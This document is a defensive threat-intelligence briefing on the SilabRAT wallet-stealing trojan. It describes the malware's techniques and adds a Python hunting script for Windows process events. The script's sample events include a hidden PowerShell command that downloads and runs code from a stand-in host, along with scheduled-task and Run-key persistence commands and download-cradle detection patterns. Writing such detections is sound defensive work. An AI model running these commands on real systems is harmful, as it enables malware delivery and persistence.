New malware service drains crypto wallets and bypasses Chrome encryption

Researchers at Group-IB have detailed SilabRAT, a new remote access trojan rented out as a subscription service that is built to empty cryptocurrency wallets and steal browser logins, and it is already being used in live attacks. The tool costs 5,000 dollars a month and is the work of a Russian-speaking developer who goes by the handle o1oo1, according to the original report.

Sold on Russian-language crime forums (Exploit, XSS, WWH, and the now-defunct RAMP) since at least September 2025, SilabRAT follows an operator-hosted model: each buyer runs their own command-and-control server, so the seller never handles victim data. One customer claimed that more than 90 percent of infected machines stayed online across a month-long campaign. Group-IB observed the malware delivered through email spam and ClickFix lures, a social-engineering trick in which a fake error or verification page instructs the victim to paste an attacker-supplied command into a Windows dialog, typically the Win+R Run box, and execute it themselves.

What it can do

SilabRAT is focused on financial theft. Its AutoWallet module quietly attempts to unlock any cryptocurrency wallet it finds on the host by trying the passwords harvested from the victim's browser against the wallet files, on the assumption that people reuse them. It also defeats Chrome App-Bound Encryption, the protection Google added in Chrome 127 that hands the key for saved cookies and passwords to a privileged Chrome service so that ordinary user-level malware can no longer decrypt them; SilabRAT gets the data back by abusing that Chrome elevation service through a helper file named APPB.dll.

To get around modern login defenses, the malware does more than steal passwords. It clones the victim's browser profile, copying the fingerprint and stored sessions onto the attacker's machine so that stolen sessions survive device and IP checks; the attacker reuses an already-authenticated session and never has to satisfy multi-factor authentication. A Hidden VNC (HVNC) feature lets the operator control the machine in a hidden desktop, with no mouse movement or windows appearing on the victim's screen, so fraudulent logins and transfers originate from the real user's device and browser.

On the host, SilabRAT bypasses Windows User Account Control through the ICMLuaUtil COM interface, tampers with the Antimalware Scan Interface (AMSI) so that script content is not handed to the installed antivirus for scanning, and keeps itself running through registry keys or scheduled tasks. Its packer is widely flagged as HijackLoader, so many engines report only the loader and never identify the SilabRAT payload underneath. Group-IB notes that o1oo1 plans to add code injection aimed at Electron-based wallet apps such as Ledger and Trezor Suite.
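The host-side behaviours described above (the ClickFix paste-and-run delivery, the ICMLuaUtil UAC bypass, and Run-key or scheduled-task persistence) each leave a recognisable trace in process-creation telemetry. The following is an added hunting example written for this briefing, not code from the Group-IB report or from IntelFusions. It runs simple behavioural rules over constructed Sysmon Event ID 1 style records. The CLSID it matches is the publicly documented CMSTPLUA COM class that exposes ICMLuaUtil, included as a known fact about the technique rather than as an indicator taken from the report; the file paths, task name and URL in the sample events are invented for illustration.

```python
"""Behavioural hunt over process-creation events for the SilabRAT tradecraft
described above. Added example; sample events below are constructed."""
import re

# CLSID of the CMSTPLUA COM server that exposes ICMLuaUtil. Publicly documented
# class behind this UAC bypass, not an IOC from the Group-IB report.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# Interpreters and download tools a pasted ClickFix command typically invokes.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "certutil.exe"}

# Download-cradle / obfuscation markers common in ClickFix commands.
CRADLE_RE = re.compile(
    r"(?i)(-enc(odedcommand)?\s|iex\b|invoke-expression|downloadstring|"
    r"invoke-webrequest|\bcurl\b.*\|\s*(iex|cmd)|mshta\s+https?://)"
)
RUNKEY_RE = re.compile(r"(?i)\\currentversion\\run(once)?\b")


def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the names of every rule the event matches (empty list if clean)."""
    hits = []
    image, parent = base(ev["Image"]), base(ev["ParentImage"])
    cmd, pcmd = ev.get("CommandLine", ""), ev.get("ParentCommandLine", "")

    # 1. ClickFix: a command pasted into Win+R runs as a child of explorer.exe.
    if parent == "explorer.exe" and image in LOLBINS and CRADLE_RE.search(cmd):
        hits.append("clickfix_run_dialog")

    # 2. ICMLuaUtil bypass: the elevated COM surrogate (dllhost.exe hosting
    #    CMSTPLUA) spawns the attacker's process with high integrity.
    if parent == "dllhost.exe" and CMSTPLUA_CLSID.lower() in pcmd.lower():
        hits.append("uac_bypass_cmstplua")

    # 3. Persistence through a scheduled task or a Run key.
    if image == "schtasks.exe" and re.search(r"(?i)/create\b", cmd):
        hits.append("persist_schtask")
    if image == "reg.exe" and re.search(r"(?i)\badd\b", cmd) and RUNKEY_RE.search(cmd):
        hits.append("persist_runkey")
    return hits


def hunt(events):
    """Map event index -> matched rule names, omitting clean events."""
    return {i: h for i, ev in enumerate(events) if (h := evaluate(ev))}


# Constructed sample events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)"',
     "ParentCommandLine": r"C:\Windows\Explorer.EXE"},
    {"Image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "ParentImage": r"C:\Windows\System32\dllhost.exe",
     "CommandLine": r"C:\Users\victim\AppData\Roaming\update.exe",
     "ParentCommandLine": r"C:\Windows\System32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\update.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn Updater /tr "C:\Users\victim\AppData\Roaming\update.exe" /f',
     "ParentCommandLine": r"C:\Users\victim\AppData\Roaming\update.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\victim\AppData\Roaming\update.exe" /f',
     "ParentCommandLine": r"cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\victim\notes.txt",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE"},
]

if __name__ == "__main__":
    for i, rules in hunt(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(rules)}")
```

The ClickFix rule keys on the parent being explorer.exe because that is what the Run dialog launches through; the same paste into a terminal the user already had open would not trip it, so pair this with the RunMRU registry history if you want to catch the dialog itself. The persistence rules only see schtasks.exe and reg.exe on the command line; a payload that writes the Run key through the registry API directly needs a registry-write event source (Sysmon Event ID 13) rather than process creation.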

What you should do

Group-IB recommends enforcing multi-factor authentication everywhere, filtering email and web traffic to block phishing and ClickFix pages, and treating any prompt that asks you to paste or run a command with suspicion. Keeping Chrome fully updated matters too, since the malware leans on a bypass of its encryption and Google continues to harden App-Bound Encryption, although an up-to-date browser does not help once malware is already running under the user's account. Endpoint telemetry should therefore also cover the behaviours described above: explorer.exe spawning a shell with a download cradle after a Run-dialog paste, the CMSTPLUA COM surrogate launching child processes, and new Run keys or scheduled tasks appearing on the host.

Defanged indicators from the report:

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.

Read the full analysis on IntelFusions